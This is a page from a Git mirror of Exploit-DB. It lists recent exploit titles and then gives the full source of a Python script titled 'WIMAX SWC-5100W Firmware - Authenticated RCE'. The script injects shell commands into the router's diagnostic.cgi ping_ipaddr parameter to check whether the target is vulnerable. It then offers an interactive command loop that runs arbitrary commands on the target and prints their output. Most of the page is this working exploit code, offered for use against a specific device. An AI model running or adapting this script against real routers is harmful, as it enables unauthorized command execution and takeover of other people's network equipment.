bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51311.py
Exploit-DB d7c9ba572a DB: 2023-04-07 
50 changes to exploits/shellcodes/ghdb

Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI

ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access

Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection
Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection
Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection
Osprey Pump Controller 1.0.1 - Administrator Backdoor Access
Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification
Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery
Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack
Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure
Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit
Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS

WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE

HospitalRun  1.0.0-beta - Local Root Exploit for macOS

Adobe Connect 10 - Username Disclosure

craftercms 4.x.x - CORS

EasyNas 1.1.0 - OS Command Injection

Agilebio Lab Collector Electronic Lab Notebook  v4.234 - Remote Code Execution (RCE)

Art Gallery Management System Project in PHP v 1.0 - SQL injection

atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE
Auto Dealer Management System 1.0 - Broken Access Control Exploit
Auto Dealer Management System v1.0 - SQL Injection
Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php
Auto Dealer Management System v1.0 - SQL Injection on manage_user.php
Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
Best pos Management System v1.0 - SQL Injection

ChurchCRM v4.5.3-121fcc1 - SQL Injection

Dompdf 1.2.1 - Remote Code Execution (RCE)
Employee Task Management System v1.0 - Broken Authentication
Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?)
Employee Task Management System v1.0 - SQL Injection on edit-task.php

flatnux 2021-03.25 - Remote Code Execution (Authenticated)

Intern Record System v1.0 - SQL Injection (Unauthenticated)

Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking

LDAP Tool Box Self Service Password v1.5.2 -  Account takeover
Music Gallery Site v1.0 - Broken Access Control
Music Gallery Site v1.0 - SQL Injection on  music_list.php
Music Gallery Site v1.0 - SQL Injection on page Master.php
Music Gallery Site v1.0 - SQL Injection on page view_music_details.php

POLR URL 2.3.0 - Shortener Admin Takeover

Purchase Order Management-1.0 - Local File Inclusion

Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS)

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)

modoboa  2.0.4 - Admin TakeOver

pdfkit v0.8.7.2 - Command Injection

FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking

Windows 11 10.0.22000 -  Backup service Privilege Escalation

TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE)

Unified Remote 3.13.0 - Remote Code Execution (RCE)
2023-04-07 00:16:28 +00:00

95 lines
No EOL
3.5 KiB
Python
Executable file
Raw Blame History

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration
import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup
red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')
args = argParser.parse_args()
target = args.target
rev = args.reverseShell
testX = args.testExploit
banner = """
____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|
RCE 0day in WIMAX SWC-5100W
[ Spell the CGI as in Cyber Guy ]
"""
def checkEXP():
print(cyan + "[+] Checking if target is vulnerable" + reset)
art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)
if request.status_code == 200:
print(green + "[+] Status code: 200 success" + reset)
soup = BeautifulSoup(request.text, 'html.parser')
if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):
print(green + "[+] Target is vulnerable" + reset)
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")
soup_validate = BeautifulSoup(uname.text, 'html.parser')
print(soup_validate.find(id="pwned").text)
else:
print(red + "[+] Seems to be not vulnerable" + reset)
else:
print(red + "[+] Status code: " + str(request.status_code) + reset)
def revShell():
cmd = input("CGI #:- ")
while cmd:
try:
print(cmd)
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")
resp = BeautifulSoup(uname.text, 'html.parser')
print(resp.find(id="result").text)
if cmd == "exit" or cmd == "quit":
print(yellow + "[*] Terminating ..." + reset)
sys.exit(0)
else:
return revShell()
except KeyboardInterrupt:
sys.exit(0)
def help():
print(
"""
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv
[*] -t, --target :: Specify target to attack.
[*] -rv, --reverseShell :: Obtain reverse shell.
[*] -tx, --testExploit :: Test the exploitability of the target.
[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.
"""
)
if target and rev:
print(banner)
revShell()
elif target and testX:
print(banner)
checkEXP()
else:
print(banner)
argParser.print_help()
Reference in a new issue View git blame Copy permalink